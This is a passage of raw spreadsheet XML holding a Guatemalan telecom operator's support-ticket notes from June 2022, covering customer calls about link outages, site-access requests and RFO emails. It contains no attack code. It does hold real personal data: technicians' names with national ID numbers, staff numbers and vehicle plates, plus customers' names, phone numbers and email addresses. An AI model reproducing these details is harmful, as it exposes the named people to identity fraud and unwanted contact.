JOSÉ ALBERTO IXPATA TOJ 	608559	NISSAN MARCH	P-155JNR	A-872	1660023131503
JAVIER DANILO CHETE CHAJON  	532967	PICK UP NISSAN	P-525JNR	T-1925	2149405940103
LUIS EMILIO GONZALEZ CATALAN  	589636	PICK UP NISSAN	P-524JNR	T-1923	2530488770101
ERWIN EDUARDO DEL CID DUBON 	52522	NISSAN MARCH	P-049JNR	A-850	1981487980101
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4610816</t>
  </si>
  <si>
    <t>* SE HABLA CON AXEL GARCIA (CLIENTE) CONFIRMA QUE SI RECIBIERON EL CORREO, ESTARÁN HACIENDO LA COORDINACION RESPECTIVA Y RESPONDERÁN AL TENER EL DATO -*
-*</t>
  </si>
  <si>
    <t>GESTION DE ACCESOS FEDERACION INTEGRAL DE COOPERATIVAS DE AHORRO Y CREDITO DE OCCIDENTE | F4610816 | |
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:INFORMATICA2@FEDECOPE.COM
CC:GRUPO N1;CNOCCA
MAR 21/06/2022 14:33
BUENA TARDE ESTIMADO CLIENTE ,
SOLICITANDO DE SU AMABLE APOYO CON PODER GESTIONAR APERTURA DE CAJERO  EN CONJUNTO CON NUESTRA ÁREA TÉCNICA PARA SERVICIO, FEDERACION INTEGRAL DE COOPERATIVAS DE AHORRO Y CREDITO DE OCCIDENTE  | F4610816 | |
FAVOR  INDICAR FECHA Y HORA DE VISITA
DATOS:
NOMBRE IBM DPI
259846 LUIS ANTONIO VILLAGRÁN MONZÓN 1812783830920
555555 CARLOS ROBERTO DE LEÓN SANTIZO 2334897970901</t>
  </si>
  <si>
    <t>F4610817</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA ARRIAZA 58258599  MENCIONA QUE ESTAN EN PR HASTA LAS 16:00 HRS
-ID 1001489448</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO EL HORARIO DE ATENCION Y LA PERSONA QUE ATENDERA A PERSONAL TECNICO EL DIA DE MAÑANA A PARTIR DE LAS 9:00 HRS
DE: ANDREA ARRIAZA &lt;PASANTERP@SAA-SEM.ORG&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 16:21
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS || SIECA. || F4610817 || SD1137232
MUY BUENAS TARDES ODALIS, ES UN GUSTO.
A CONTINUACIÓN COMPARTO LOS DATOS:
HORARIO DE ATENCIÓN: 9:00 A 16:00 HORAS.
PERSONA QUE ATIENDE:  ELENA ARRIAZA.
NÚMERO: 5825-8599 / 4286-1116
MUCHAS GRACIAS POR LA ATENCIÓN, QUEDAMOS A LA ESPERA DE SU VISITA.
SALUDOS CORDIALES.
*-*-*-*-*</t>
  </si>
  <si>
    <t>CLIENTE MENCIONA QUE ESTARA RESPONDIENDO EL CORREO CUANDO YA TENGA AUTORIZADOS LOS PERMISOS Y EL NOMBRE DE LA PERSONA QUE ATENDERA A PERSONAL TECNICO
-ID 1001489448</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 15:55
PARA: PASANTERP@SAA-SEM.ORG &lt;PASANTERP@SAA-SEM.ORG&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || SIECA. || F4610817 || SD1137232
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE  -   IBM  -  VEHICULO -  PLACA  - NO. ORDEN  - DPI PUESTO
JUAN ALBERTO TRUJILLO ORTIZ 732334 NISSAN MARCH P-037JNR A-782 2487190760115 TECNICO EN TRANSMISION 1
MARLON ENRIQUE MUÑOZ ORELLANA   652515 NISSAN MARCH P-173JFM A-864 1582465001801 TECNICO ESPECIALIZADO EN TRANSMISION
DANIEL ENRIQUE MONTENEGRO CARACUN 659473 NISSAN MARCH P-617GTV A-699 2414544250101 TECNICO EN TRANSMISION 1
EDGAR DANIEL GOMEZ MENDEZ 589058 NISSAN MARCH P-121JNR A-828 1628972431401 TECNICO EN TRANSMISION 1
MILTON ENRIQUE SALAZAR PÉREZ 725586 NISSAN MARCH P-154JNR A-871 2626487840101 TECNICO EN TRANSMISION 1
PEDRO EDUARDO TOT MARTINEZ 739764 NISSAN SEDAN P-055GLD A-636 1681348100101 TECNICO EN TRANSMISION 1
JUAN JOSE RODRIGUEZ PAZ   217826 NISSAN MARCH P-740GTV A-698 2494432600208 TECNICO EN TRANSMISION 1
JOSÉ ALBERTO IXPATA TOJ 608559 NISSAN MARCH P-155JNR A-872 1660023131503 TECNICO EN TRANSMISION 1
JAVIER DANILO CHETE CHAJON   532967 PICK UP NISSAN P-525JNR T-1925 2149405940103 TECNICO EN TELECOMUNICACIONES
LUIS EMILIO GONZALEZ CATALAN   589636 PICK UP NISSAN P-524JNR T-1923 2530488770101 TECNICO EN TELECOMUNICACIONES
ERWIN EDUARDO DEL CID DUBON 52522 NISSAN MARCH P-049JNR A-850 1981487980101 TECNICO ESPECIALIZADO EN TRANSMISION
HECTOR MISAEL RAMIREZ CARDONA 710195 224923862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610821</t>
  </si>
  <si>
    <t>*- SE SOLICITA APOYO A PERSONAL DE CNOC CON LA VERIFICACION, NO APLICA PC, SE CAMBIA A WP -*
-*</t>
  </si>
  <si>
    <t>F4610841</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRUZ SANCHEZ  AL 8238-6140 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001442537
**</t>
  </si>
  <si>
    <t>F4610843</t>
  </si>
  <si>
    <t>SE HABLÓ CON ESDRAS VÁSQUEZ/CLIENTE 25069510 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ANGEL RODRIGUEZ 25069510 CONTESTA ESDRAS VASQUEZ  CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DEL TICKET **
-ID 1001508003
**</t>
  </si>
  <si>
    <t>F4610850</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY AGUILAR 42105672 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 10015233</t>
  </si>
  <si>
    <t>F4610860</t>
  </si>
  <si>
    <t>--- BYRON CASTAÑEDA 55717389 (CLIENTE), CONFIRMA, AUTORIZA EL CIERRE, SE INFORMA A CNOC REACTIVO POR SKYPE.---
RESULTADO: LLAMADA HECHA
NOMBRE: 55717389
NÚMERO: 55717389
INICIO: HOY, 13:37
FIN: HOY, 14:04
DURACIÓN: 27:47
ID DE LLAMADA: 1001670716
...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON ANIBAL CASTAÑEDA 55717389 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 1001591802</t>
  </si>
  <si>
    <t>***--- SEGÚN CORREO DEL CNOC SEGUIMIENTO CON COMERCIAL HOY EN HORARIO HABIL ---***
DE: PERLA MARINA ESTRADA PACAY
ENVIADO EL: MARTES, 21 DE JUNIO DE 2022 23:26
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NELSON GERARDO YUTAN CHARUC &lt;NELSON.YUTAN@SOMOSCMI.COM&gt;; RICARDO ENRIQUE ARGUETA GIRON &lt;RICARDO.ARGUETAG@SOMOSCMI.COM&gt;; BELTER FRANCISCO AGUIRRE TELLEZ &lt;BELTER.AGUIRRE@SOMOSCMI.COM&gt;; BYRON ANIBAL CASTAÑEDA &lt;BYRON.CASTANEDA@SOMOSCMI.COM&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; ERICK SANCHEZ &lt;ERICK.SANCHEZS@SOMOSCMI.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; JUAN JOSE ANLEU SARAVIA &lt;JUAN.ANLEU@CLARO.COM.GT&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; EDGAR JOSÉ MARTINEZ MÉNDEZ &lt;EDGAR.MARTINEZ@SOMOSCMI.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.GT&gt;; CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; JOSE DAVID RAMIREZ STAMBUK &lt;JOSEDAV.RAMIREZ@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; KEVIN ADOLFO GARCIA MARROQUIN &lt;KEVIN.GARCIA@SOMOSCMI.COM&gt;
ASUNTO: RE: G443 MODIFICAR LA IP AL EQUIPO HUAWEI APN CLARO
BUENAS NOCHES:
POR ESTE MEDIO SE LE INFORMA QUE   DE ACUERDO A LO PLATICADO EN LA LLAMADA SE ESCALO CON EJECUTIVO DE CUENTA PARA REALIZAR EL CAMBIO DE APROVISIONAMIENTO  IP  O SI ES NECESARIO    CAMBIO DEL SIM.
SE LE INFORMA QUE SE   ESCALÓ   A LAS ÁREAS CORRESPONDIENTES PARA AGILIZAR ESTE PROCESO LO ANTES POSIBLE. COMO SE INDICO   SE DARÁ SEGUIMIENTO EL DÍA DE MAÑANA 22/06/2022   A PRIMERA HORA. PEDIMOS UNA DISCULPA POR LOS INCONVENIENTES CAUSADOS.
FELIZ NOCHE.</t>
  </si>
  <si>
    <t>F4610877</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE KARLA RODRIGUEZ 78415318 CLIENTE SOLICITA QUE SE COORDINE VISITA TÉCNICA, INDICA QUE EL EQUIPO SE ENCUENTRA NUEVAMENTE ALARMADO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KARLA RODRÍGUEZ  78415318 MENCIONA QUE NO HAN PRESENTADO PROBLEMA CON EL SERVICIO
SE VALIDARA A LAS 14:30 EL FUNCIONAMIENTO
-ID 1001593397</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KARLA RODRÍGUEZ 78415318 MENCIONA QUE HASTA EL MOMENTO NO HA PRESENTADO PROBLEMA PERO SOLICITA SE PUEDA MANTENER EN OBSERVACION PORQUE EL DIA DE AYER VOLVIO A PRESENTAR PROBLEMA EN LA TARDE
CLIENTE SOLICITA SE VALIDE A LAS 10:00 HRS Y A LAS 14:30
-ID 1001557164</t>
  </si>
  <si>
    <t>F4610890</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL
CAIDO ENLACE_CLARO-XT_ALIANSA-MASAGUA_SECUNDARIO _ C-0103102901</t>
  </si>
  <si>
    <t>****--- SE ENVÍA CORREO A CL PARA VALIDAR --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 03:24
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;
ASUNTO: RE: CAIDO ENLACE_CLARO-XT_ALIANSA-MASAGUA_SECUNDARIO _ C-0103102901
BUENOS DÍAS ESTIMADO SR. REYES.
                PODRÍA APOYARNOS EN VALIDAR EL FUNCIONAMIENTO E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4610905</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YURI MYNOR CRUZ 24447600 EXT. 7793 MENCIONA QUE ESTARA REALIZANDO PRUEBAS CON PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 1001493237</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  YURI MYNOR CRUZ 24447600 EXT. 7793 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 1001499681 - 1001499871</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE 24447600 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001505691</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24447600 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001516893</t>
  </si>
  <si>
    <t>**SE LLAMA  CLIENTE 24447600 NO RESPONDE, SE INTENTARA LUEGO **
-ID 1001510553
**</t>
  </si>
  <si>
    <t>F4610913</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARLON ALEXIS NAVAS SAZO  AL 1724 EXT 87270 CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
-ID 1001461353
**</t>
  </si>
  <si>
    <t>F4610914</t>
  </si>
  <si>
    <t>SE LLAMO A CRISTIAN ¿PARA REALIZAR PRUEBAS PRO NO RESPONDE 78606040
78606040</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN CANIZALEZ  786060400 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001500677</t>
  </si>
  <si>
    <t>F4610929</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 21 DE JUNIO DE 2022 14:21PARA: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SERVICEDESKTI &lt;SERVICEDESK@GRUPOMONGE.COM&gt;; TELECOMUNICACIONES@GRUPOMONGE.COM &lt;TELECOMUNICACIONES@GRUPOMONGE.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_GMG_GT_INTERNET_TIENDA_11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0929
ID: 313900369T
IDENTIFICADOR DEL CLIENTE:  CC_GMG_GT_INTERNET_TIENDA_116
UBICADO EN:  INTERNET_4 C. 2-34 Z.1 HUEHUETENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4610930</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SILAS MORALES 47912899 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001502829</t>
  </si>
  <si>
    <t>F4610931</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
 NEW TT // CLIENT:MAPFRE // TOTAL ISOLATION // TT INC000003778639// TT PROVIDER??</t>
  </si>
  <si>
    <t>SE LE PROPORCIONA LA INFORMACION SOLICITADA AL CLIENTE</t>
  </si>
  <si>
    <t>F4610939</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 44076125  PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001506285</t>
  </si>
  <si>
    <t>F4610940</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OSCAR CALEL 56996333 UBICA LOS EQUIPO, VALIDA EQUIPOS ENCENDIDOS, APLICA REINICIO PERO ENLACE CONTINUA DOWN.
PWR: VERDE
ALM: ROJO
SYN: VERDE
1: VERDE</t>
  </si>
  <si>
    <t>F4610942</t>
  </si>
  <si>
    <t>SE LLAMO AL 56975899 ATIENDE ESTUARDO RUEDA QUIEN  VALIDA EL SERVICIO
1001885354
COLA:
NOMBRE: A: 56975899
NÚMERO: 56975899
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 56975899
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 23/06/2022 13:02:25</t>
  </si>
  <si>
    <t>CLIENTE JENNIFER SOTO SOLICITA SE LE COPIE A LA CADENA DE CORREOS QUE SE TIENE CON RESPECTO DE LOS PERMISOS DE INGRESO.
1001482027
COLA:
NOMBRE: A: 56975899
NÚMERO: 56975899
DURACIÓN: 0:04:56
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 56975899
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 21/06/2022 15:29:18</t>
  </si>
  <si>
    <t>F4610943</t>
  </si>
  <si>
    <t>ABNER HERNANDEZ APOYA CON INDICAR EN DONDE SE UBICA LA CENTRAL DE CLARO EN EL AEROPUERTO. TECNICOS PROCEDEN A CONSULTAR  SI TIENEN ACCESO A ESTA SALA O NECESITAN UN PERMISOS ESPECIAL DEL AEROPUERTO. SE CONTACTARÁ EN 20 MINUTOS.
RESULTADO: LLAMADA HECHA
NOMBRE: PARTICIPANTE DE CONFERENCIA
NÚMERO:
INICIO: HOY, 11:24
FIN: HOY, 11:30
DURACIÓN: 5:37
ID DE LLAMADA: 1001851815</t>
  </si>
  <si>
    <t>CLIENTE JENNIFER SOTO SOLICITA SE LE COPIE A LA CADENA DE CORREOS QUE SE TIENE CON RESPECTO DE LOS PERMISOS DE INGRESO.
1001482027
COLA:
NOMBRE: A: 56975899
NÚMERO: 56975899
DURACIÓN: 0:04:56
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 56975899
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES</t>
  </si>
  <si>
    <t>F4610945</t>
  </si>
  <si>
    <t>F4610951</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL CON OPERATIVIDAD DEL SERVICIO..--
REPORTANDO | SAMSUNG * GUATEMALA * SAMS-GTM-GUA-0001 * CID 410076 * DOWN * INC000003778369 * SEV 2</t>
  </si>
  <si>
    <t>F4610964</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON CLIENTE SR. LUIS PINEDA INFORMA QUE YA VALIDO Y SE CONECTAO AL MERAKI Y ESTE MERAKI LE PROPORCIONO LA RED 192.168.11.1, SOLICITA QUE SE LE LLAME NUEVAMENTE PARA REALIZAR PRUEBAS  EN CONJUNTO.</t>
  </si>
  <si>
    <t>F4610966</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, POR LO QUE QUEDAMOS A LA ESPERA DE LA VALIDACION
RE: REPORTANDO| AVIANCA * GUATEMALA * MULTIPLE CIRCUIT * CID 162668 &amp; 436985 &amp; 437182  * DOWN *  INC000003778356
-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 17:35
PARA: SMC RECOVERY AMERICAS BUSINESS SOLUTIONS &lt;SMC.RECOVERY.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: REPORTANDO| AVIANCA * GUATEMALA * MULTIPLE CIRCUIT * CID 162668 &amp; 436985 &amp; 437182 * DOWN * INC000003778356
*-*-*-</t>
  </si>
  <si>
    <t>F4610999</t>
  </si>
  <si>
    <t>F4611004</t>
  </si>
  <si>
    <t>F4611008</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 15:19
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || COFINO STAHL Y COMPANIA
BUENA TARDE
SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO PARA LOS SIGUIENTES TICKETS QUE FUERON AFECTADOS POR MASIVA.
ID	TICKET
672700005T
SD1137132
672700006T
SD1137133
673000009T
SD1137138
673000036T
SD1137139
673000018T
SD1137141
673000035T
SD1137142
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>F4611011</t>
  </si>
  <si>
    <t>F4611012</t>
  </si>
  <si>
    <t>F4611013</t>
  </si>
  <si>
    <t>F4611015</t>
  </si>
  <si>
    <t>F4611016</t>
  </si>
  <si>
    <t>F4611018</t>
  </si>
  <si>
    <t>#### DE IGUAL MANERA SE ENVIO CORREO AL CLIENTE PARA GESTIONAR PERMISOS ###
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 21 DE JUNIO DE 2022 17:21
PARA: TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;;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GESTION DE PERMISOS |8902039T |BANRURAL |REDUNDANCIA WIMAX.- 4 C. 1-43 ZONA 6 LOS ALAMOS SAN MIGUEL PETAPA BODEGA LOS ALAMOS
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 8902039T |BANRURAL   |REDUNDANCIA WIMAX.- 4 C. 1-43 ZONA 6 LOS ALAMOS SAN MIGUEL PETAPA BODEGA LOS ALAMOS
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
531718 MAYNOR ALEXANDER CABRERA LIX               2388 41235 1414 58261468
31511 RONALD DANILO CATALÁN ANDAVERDE         2958 46402 0101 58263198
975071 GANDHI JOSÉ GARCÍA QUIÑÓNEZ                  2602 73627 0401 58264829
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4611020</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 3 VECES MILTON BARRERA-58263430 ##TELEFONO DESCOLGADO# NO CONTESTA## VIVO##</t>
  </si>
  <si>
    <t>MILTON BARRERA-58263430  -- SE TIENE EN LINEA- ### COMENTA QUE EL PROBLEMA ERA DE SU PBX PERO YA LO SOLVENTO ##VALIDA CIERRE##VIVO</t>
  </si>
  <si>
    <t>F4611023</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 15:30
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;
ASUNTO: TELEFÓNICA INTERNATIONAL WHOLESALE SERVICES || C-0201801274 || F4611023
BUENA TARDE
    SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
TELEFÓNICA INTERNATIONAL WHOLESALE SERVICES
C-0201801274
F4611023 - SD1137292
CUALQUIER CONSULTA, A LA ORDEN.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4611026</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE HUGO CONTRERAS QUIEN VA APOYAR A REVISAR EQUIPOS.
1001499577
COLA:
NOMBRE: A: 55550303
NÚMERO: 55550303
DURACIÓN: 0:00:28
ESTADO: CONECTADA
DETALLES: 55550303
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 21/06/2022 16:23:02</t>
  </si>
  <si>
    <t>F4611028</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GEOVANNI LOVO 75133236 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001652512
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GEOVANNI LOVO 75133236 MENCIONA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:00 HRS
-ID 1001520507</t>
  </si>
  <si>
    <t>F4611039</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO RIVAS 76001358 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001520944</t>
  </si>
  <si>
    <t>F4611052</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL RESPONDE MOISES MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001498674</t>
  </si>
  <si>
    <t>F4611056</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 42940287  PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001521644</t>
  </si>
  <si>
    <t>F4611063</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 17:14
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KENIA CERROS SANTIAGO &lt;KENIA.CERROS@ELEKTRA.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CENTRO DE ATENCION DE ENLACES &lt;CAE@AZTECASERVICIOS.COM&gt;; 'SERGIO DAVID PINEDA' &lt;SSICAL@ITSINFOCOM.COM&gt;; JHERNANDEZ10@ITSINFOCOM.COM &lt;JHERNANDEZ10@ITSINFOCOM.COM&gt;
ASUNTO: RE: ID ENLACE: 265900321 || 9607_ETE_DISTRIBUIDOR_PUERTO_BARRIOS_GUATEMALA
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4611064</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CONTESTO MOISES PACAJO EL CUAL COMENTA QUE VE ALERTADO UPS INDICA QUE SEGURAMENTE ES POR FALLA DE ENERGIA, SE BRINDARA SEGUIMIENTO SI NO RESTABLECE ENLACE.
1001477807
COLA:
NOMBRE: A: 24207212
